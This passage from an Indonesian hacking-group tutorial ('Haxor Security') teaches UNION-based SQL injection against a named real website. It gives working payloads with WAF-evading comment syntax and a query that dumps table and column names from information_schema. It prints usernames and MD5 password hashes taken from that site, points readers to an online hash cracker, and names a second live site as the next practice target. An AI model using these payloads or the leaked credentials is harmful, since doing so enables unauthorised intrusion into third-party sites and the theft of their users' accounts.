Haxor Security
3. Oke sekarang kita akan mencari angka ajaib atau angka yang
menunjukan letak database nya, dengan payloads sebagai
berikut:
Payloads: http://www.interaliaproject.com/news.php?id=-
115%27+/*!50000union*/+/*!50000select*/+1,2,3,4,5,6+--+
Yups disini muncul beberapa angka , kita ambil angka yang cukup
jelas yaitu angka 3
Payloads:
http://www.interaliaproject.com/news.php?id=-
115%27+/*!50000union*/+/*!50000select*/+1,2,(select(@x)from(sel
ect(@x:=0x00),(select(0)from(information_schema.columns)where(t
able_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,t
able_name,0x203a3a20,column_name))))x),4,5,6+--+
Usename :: Password
- Interalia :: 010f052b09867307a98f7c744e0f0106
- antonis :: cd64c618627016120817ca5eaeb9a29e
Nah password diatas masih berbentuk md5 yang harus kita hash,
jangan khawatir kita hanya tinggal copy dan pastekan di web online
www.hashkiller.co.uk/Cracker/MD5
PENUTUP
Jika kalian sudah paham dengan tutorial materi diatas, kita belajar
bersama dengan target berikutnya
http://ubraintv.com/watchchannel.php?id=6
Oke sekian dulu materi kali ini mohon maaf apabila penjelasan ini
kurang dipahami jika ada pertanyaan apapun bisa ditanyakan
langsung di forum diskusi grup. Untuk materi selanjutnya saya sultan
rizky akan membahas tentang sql injetion with sqlmap .
Note*
Terimakasih kepada tim admin haxor yang telah membantu
berjalannya materi ini, tidak lupa untuk member haxor security untuk
tetap belajar oke. Dan tolong untuk para pro player untuk tidak
merendah share ilmu kalian agar lebih bermanfaat.
Instagram: @haxor_sec
Web : http://www.haxorsec.net
Fanspage : Haxor Security
SUPPORTED BY :